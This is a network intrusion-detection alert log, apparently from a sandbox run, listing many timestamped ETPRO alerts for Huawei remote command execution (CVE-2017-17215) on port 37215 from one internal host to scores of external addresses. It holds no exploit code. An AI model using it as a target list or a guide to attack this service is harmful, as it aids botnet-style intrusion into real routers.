                                                        06/13/24-21:33:09.102012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887237215192.168.2.14197.28.138.195
                                                        06/13/24-21:33:09.129259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411637215192.168.2.14156.217.105.200
                                                        06/13/24-21:32:15.609684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3554437215192.168.2.1441.115.150.194
                                                        06/13/24-21:32:42.424305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3856637215192.168.2.14197.251.194.13
                                                        06/13/24-21:31:59.198314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883037215192.168.2.14156.115.1.221
                                                        06/13/24-21:33:02.914612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824437215192.168.2.14156.98.114.151
                                                        06/13/24-21:32:09.458461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322437215192.168.2.14156.172.41.91
                                                        06/13/24-21:33:00.870696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5090437215192.168.2.1441.184.121.254
                                                        06/13/24-21:32:34.192193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527237215192.168.2.1441.60.183.213
                                                        06/13/24-21:32:36.264796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4094637215192.168.2.14156.78.138.251
                                                        06/13/24-21:32:38.324031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6046437215192.168.2.14197.221.185.196
                                                        06/13/24-21:32:42.421653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771837215192.168.2.14156.85.144.197
                                                        06/13/24-21:33:15.272626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944837215192.168.2.1441.182.236.11
                                                        06/13/24-21:32:56.757801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581037215192.168.2.1441.242.131.31
                                                        06/13/24-21:33:13.210596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561637215192.168.2.14156.126.58.6
                                                        06/13/24-21:33:04.989006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5341837215192.168.2.14156.245.101.63
                                                        06/13/24-21:32:21.803857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941037215192.168.2.14197.70.160.83
                                                        06/13/24-21:33:07.041046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5674037215192.168.2.1441.227.139.70
                                                        06/13/24-21:33:07.039946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734037215192.168.2.14156.198.112.135
                                                        06/13/24-21:33:07.042813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242437215192.168.2.14156.181.212.47
                                                        06/13/24-21:32:17.695945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459237215192.168.2.14197.19.112.142
                                                        06/13/24-21:32:56.757610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133237215192.168.2.1441.229.239.79
                                                        06/13/24-21:31:59.196471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791237215192.168.2.14197.67.9.14
                                                        06/13/24-21:32:44.452207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5600837215192.168.2.1441.235.31.42
                                                        06/13/24-21:32:07.418132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720437215192.168.2.1441.139.8.250
                                                        06/13/24-21:32:23.832513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3691637215192.168.2.14197.65.145.146
                                                        06/13/24-21:32:11.509093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491437215192.168.2.14156.34.79.176
                                                        06/13/24-21:32:28.048251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3928037215192.168.2.1441.224.234.25
                                                        06/13/24-21:33:02.913860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772437215192.168.2.1441.41.134.34
                                                        06/13/24-21:32:46.523972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3693037215192.168.2.14197.14.232.180
                                                        06/13/24-21:33:02.914628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822037215192.168.2.14197.203.148.85
                                                        06/13/24-21:32:56.759199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608037215192.168.2.14156.112.13.27
                                                        06/13/24-21:32:17.678161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331037215192.168.2.1441.8.193.116
                                                        06/13/24-21:31:57.136223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501437215192.168.2.14156.203.51.107
                                                        06/13/24-21:32:48.568688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300637215192.168.2.14197.135.200.51
                                                        06/13/24-21:32:40.374502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959237215192.168.2.14156.44.248.15
                                                        06/13/24-21:32:09.454386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217037215192.168.2.14197.42.196.59
                                                        06/13/24-21:32:38.301523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656037215192.168.2.1441.130.245.228
                                                        06/13/24-21:32:15.611273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4884037215192.168.2.14197.111.137.66
                                                        06/13/24-21:33:02.907277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913437215192.168.2.14197.152.204.115
                                                        06/13/24-21:33:02.913441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082437215192.168.2.14156.159.225.135
                                                        06/13/24-21:32:15.611328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562837215192.168.2.1441.40.8.27
                                                        06/13/24-21:32:25.969406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659837215192.168.2.14197.209.143.202
                                                        06/13/24-21:33:05.013336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190837215192.168.2.14197.64.187.20
                                                        06/13/24-21:32:11.505459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915037215192.168.2.14156.60.144.103
                                                        06/13/24-21:31:57.092411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3590437215192.168.2.14156.243.0.183
                                                        06/13/24-21:32:54.727107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894237215192.168.2.14197.221.40.80
                                                        06/13/24-21:32:44.479916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152637215192.168.2.1441.220.149.89
                                                        06/13/24-21:33:05.013604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6096837215192.168.2.14197.14.212.84
                                                        06/13/24-21:32:56.754764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5156437215192.168.2.14197.55.75.51
                                                        06/13/24-21:32:09.439220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538237215192.168.2.14197.116.85.219
                                                        06/13/24-21:33:04.990801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3778237215192.168.2.14197.104.71.177
                                                        06/13/24-21:32:03.274983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4217837215192.168.2.14156.143.125.114
                                                        06/13/24-21:32:23.836409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4714437215192.168.2.1441.43.185.10
                                                        06/13/24-21:31:57.130359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671037215192.168.2.1441.199.255.244
                                                        06/13/24-21:33:02.914560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5036837215192.168.2.1441.61.254.171
                                                        06/13/24-21:33:09.087602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4060037215192.168.2.1441.201.96.78
                                                        06/13/24-21:33:15.269130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856037215192.168.2.1441.57.95.10
                                                        06/13/24-21:32:03.275292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318437215192.168.2.14197.126.217.241
                                                        06/13/24-21:32:30.127147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200037215192.168.2.14197.206.94.185
                                                        06/13/24-21:32:25.991501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348037215192.168.2.1441.28.68.34
                                                        06/13/24-21:32:42.409244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068237215192.168.2.14156.167.94.204
                                                        06/13/24-21:32:34.214659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885237215192.168.2.14156.128.52.149
                                                        06/13/24-21:32:56.756597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863437215192.168.2.14197.126.50.219
                                                        06/13/24-21:32:23.937058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4705237215192.168.2.14156.110.139.64
                                                        06/13/24-21:33:05.010636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892637215192.168.2.14197.93.142.17
                                                        06/13/24-21:31:59.196069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4011637215192.168.2.14197.207.130.124
                                                        06/13/24-21:33:04.992652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3857637215192.168.2.1441.70.228.234
                                                        06/13/24-21:32:40.357429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542637215192.168.2.1441.15.15.77
                                                        06/13/24-21:32:42.403403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021237215192.168.2.14197.94.153.38
                                                        06/13/24-21:32:19.749050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988237215192.168.2.14197.211.240.137
                                                        06/13/24-21:32:42.409430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802837215192.168.2.14156.27.140.219
                                                        06/13/24-21:32:15.608710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4638037215192.168.2.14197.168.81.173
                                                        06/13/24-21:33:05.010933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791637215192.168.2.14197.197.223.16
                                                        06/13/24-21:32:03.306735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564637215192.168.2.14197.15.218.165
                                                        06/13/24-21:33:09.087560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211637215192.168.2.1441.198.25.66
                                                        06/13/24-21:33:11.157044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3343237215192.168.2.14197.179.186.86
                                                        06/13/24-21:32:19.729996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585437215192.168.2.1441.181.197.148
                                                        06/13/24-21:33:00.869864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875637215192.168.2.14156.152.119.253
                                                        06/13/24-21:32:52.678311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084037215192.168.2.14197.232.96.220
                                                        06/13/24-21:32:19.730803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762437215192.168.2.14156.129.25.116
                                                        06/13/24-21:32:52.671582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6001437215192.168.2.14197.129.242.100
                                                        06/13/24-21:32:56.756523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616237215192.168.2.14156.116.65.222
                                                        06/13/24-21:31:57.135834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813837215192.168.2.1441.194.164.164
                                                        06/13/24-21:32:03.299755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5521637215192.168.2.14197.224.168.26
                                                        06/13/24-21:32:17.694046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347637215192.168.2.1441.16.60.118
                                                        06/13/24-21:32:09.436921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4294837215192.168.2.14197.71.185.52
                                                        06/13/24-21:31:59.175109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5835637215192.168.2.14197.156.227.155
                                                        06/13/24-21:32:44.451987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516237215192.168.2.14156.95.13.49
                                                        06/13/24-21:32:15.610825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372437215192.168.2.14197.249.57.93
                                                        06/13/24-21:33:09.128959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483037215192.168.2.14197.154.126.33
                                                        06/13/24-21:31:57.153061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821437215192.168.2.14156.218.212.198
                                                        06/13/24-21:32:11.508043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4818237215192.168.2.1441.14.6.218
                                                        06/13/24-21:33:02.954777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3541437215192.168.2.14197.186.141.80
                                                        06/13/24-21:33:09.086360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4885637215192.168.2.1441.216.94.153
                                                        06/13/24-21:32:42.406308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5115437215192.168.2.14197.110.79.70
                                                        06/13/24-21:32:32.151190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5034837215192.168.2.14156.85.244.168
                                                        06/13/24-21:33:13.213019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114237215192.168.2.14197.191.184.193
                                                        06/13/24-21:32:17.694930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5903837215192.168.2.1441.63.253.240
                                                        06/13/24-21:32:28.028466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066037215192.168.2.1441.226.89.188
                                                        06/13/24-21:32:58.819931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810037215192.168.2.14156.194.222.51
                                                        06/13/24-21:32:44.477125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4371237215192.168.2.14156.139.70.42
                                                        06/13/24-21:32:01.221469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3799437215192.168.2.14197.86.45.50
                                                        06/13/24-21:32:03.307489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578237215192.168.2.14156.111.19.202
                                                        06/13/24-21:32:30.094733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4597037215192.168.2.14156.111.248.106
                                                        06/13/24-21:33:00.889186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5929637215192.168.2.14156.137.142.148
                                                        06/13/24-21:32:17.697705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040837215192.168.2.1441.116.73.52
                                                        06/13/24-21:32:25.970547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3307637215192.168.2.1441.162.217.201
                                                        06/13/24-21:32:05.369998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305037215192.168.2.14156.36.24.244
                                                        06/13/24-21:33:17.308710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853437215192.168.2.14197.100.114.218
                                                        06/13/24-21:32:17.671957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237637215192.168.2.14197.34.44.211
                                                        06/13/24-21:33:00.870106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3288837215192.168.2.14197.255.74.208
                                                        06/13/24-21:32:46.527889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373637215192.168.2.14156.179.94.20
                                                        06/13/24-21:32:30.077388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4116837215192.168.2.1441.110.56.234
                                                        06/13/24-21:32:46.525840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3671037215192.168.2.14156.176.179.117
                                                        06/13/24-21:33:02.953726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4555837215192.168.2.14156.206.96.223
                                                        06/13/24-21:33:05.016053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4294637215192.168.2.14156.46.232.247
                                                        06/13/24-21:32:58.820289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845037215192.168.2.14197.46.100.117
                                                        06/13/24-21:33:00.887731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379637215192.168.2.14156.212.187.207
                                                        06/13/24-21:32:44.452569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4225037215192.168.2.14197.112.212.167
                                                        06/13/24-21:31:57.094218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351037215192.168.2.1441.40.22.39
                                                        06/13/24-21:32:50.613981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6009237215192.168.2.14156.172.61.209
                                                        06/13/24-21:33:15.252164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5741237215192.168.2.1441.185.41.130
                                                        06/13/24-21:32:03.274412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488837215192.168.2.14156.38.21.80
                                                        06/13/24-21:33:15.270612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5087437215192.168.2.14156.24.21.209
                                                        06/13/24-21:32:21.799847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544037215192.168.2.14197.99.76.37
                                                        06/13/24-21:32:34.196885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052237215192.168.2.14156.45.158.211
                                                        06/13/24-21:33:00.867082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6079237215192.168.2.1441.196.131.20
                                                        06/13/24-21:32:05.345883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917837215192.168.2.14156.4.145.186
                                                        06/13/24-21:32:30.073623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4909437215192.168.2.14156.111.212.231
                                                        06/13/24-21:32:40.375624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186437215192.168.2.1441.147.10.226
                                                        06/13/24-21:33:07.060224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503437215192.168.2.1441.110.62.99
                                                        06/13/24-21:32:50.613523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3993237215192.168.2.14197.119.185.166
                                                        06/13/24-21:31:57.134024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792237215192.168.2.14197.96.68.254
                                                        06/13/24-21:32:28.024474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5439837215192.168.2.14197.148.42.51
                                                        06/13/24-21:32:19.727701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4028837215192.168.2.14156.224.98.2
                                                        06/13/24-21:33:17.305749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459437215192.168.2.1441.213.126.245
                                                        06/13/24-21:32:50.630434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5662237215192.168.2.1441.215.5.235
                                                        06/13/24-21:33:00.868875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3746637215192.168.2.14156.30.151.222
                                                        06/13/24-21:32:50.617758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5612237215192.168.2.14197.161.1.160
                                                        06/13/24-21:32:58.821146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917437215192.168.2.14156.41.90.154
                                                        06/13/24-21:32:11.487139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283637215192.168.2.1441.17.64.57
                                                        06/13/24-21:33:09.106950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769437215192.168.2.1441.96.196.92
                                                        06/13/24-21:32:25.991172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510237215192.168.2.14197.207.111.255
                                                        06/13/24-21:32:40.376403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5115037215192.168.2.14197.55.141.98
                                                        06/13/24-21:32:56.791547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4059037215192.168.2.1441.16.40.26
                                                        06/13/24-21:32:30.128867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4338237215192.168.2.14156.20.27.156
                                                        06/13/24-21:32:42.409536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982837215192.168.2.14197.153.110.89
                                                        06/13/24-21:32:09.455920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864237215192.168.2.14156.90.189.139
                                                        06/13/24-21:33:09.108096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5551237215192.168.2.14197.200.140.60
                                                        06/13/24-21:32:34.193305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5776237215192.168.2.1441.136.242.76
                                                        06/13/24-21:32:05.349373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3540837215192.168.2.14197.58.133.152
                                                        06/13/24-21:31:57.092508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5230637215192.168.2.1441.46.183.102
                                                        06/13/24-21:32:19.752902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5044437215192.168.2.14197.13.153.18
                                                        06/13/24-21:32:25.991397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068637215192.168.2.14197.159.78.248
                                                        06/13/24-21:32:25.973047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488637215192.168.2.14156.1.161.165
                                                        06/13/24-21:32:32.167595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534437215192.168.2.14156.246.254.33
                                                        06/13/24-21:32:36.263073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014037215192.168.2.14156.185.190.172
                                                        06/13/24-21:32:58.840985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804437215192.168.2.14197.43.141.216
                                                        06/13/24-21:32:40.375312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077237215192.168.2.1441.122.152.219
                                                        06/13/24-21:32:50.633141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4576637215192.168.2.1441.73.232.167
                                                        06/13/24-21:32:46.509252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457437215192.168.2.14197.154.249.3
                                                        06/13/24-21:32:01.224061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849237215192.168.2.1441.3.27.154
                                                        06/13/24-21:32:05.350192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947037215192.168.2.1441.112.229.49
                                                        06/13/24-21:32:23.832636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3602437215192.168.2.1441.212.48.170
                                                        06/13/24-21:32:42.404821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743837215192.168.2.14197.38.82.137
                                                        06/13/24-21:33:09.110446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5632437215192.168.2.14197.54.235.92
                                                        06/13/24-21:32:48.551260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5054637215192.168.2.1441.107.192.9
                                                        06/13/24-21:32:21.805388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048437215192.168.2.14197.83.228.114
                                                        06/13/24-21:32:44.454260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351037215192.168.2.14156.47.175.176
                                                        06/13/24-21:32:44.456603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992437215192.168.2.14197.93.190.255
                                                        06/13/24-21:33:13.231781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4589237215192.168.2.1441.144.170.21
                                                        06/13/24-21:32:07.415678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411237215192.168.2.1441.241.149.150
                                                        06/13/24-21:32:07.415442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4691637215192.168.2.14156.66.40.62
                                                        06/13/24-21:32:58.823394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4123037215192.168.2.14156.159.69.96
                                                        06/13/24-21:32:44.454905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5202237215192.168.2.14197.185.139.247
                                                        06/13/24-21:32:09.456872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3573437215192.168.2.1441.219.124.160
                                                        06/13/24-21:32:40.371910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3903637215192.168.2.1441.232.219.34
                                                        06/13/24-21:32:48.549897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291637215192.168.2.14156.61.201.156
                                                        06/13/24-21:32:52.657522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070037215192.168.2.14197.184.80.190
                                                        06/13/24-21:32:38.316083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547437215192.168.2.14197.236.150.246
                                                        06/13/24-21:33:09.087049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4232037215192.168.2.1441.141.232.203
                                                        06/13/24-21:33:13.212913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755037215192.168.2.14197.52.59.96
                                                        06/13/24-21:32:32.169931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379637215192.168.2.14197.216.141.151
                                                        06/13/24-21:32:03.293769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684837215192.168.2.1441.116.81.92
                                                        06/13/24-21:32:38.301397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4762837215192.168.2.14197.10.176.62
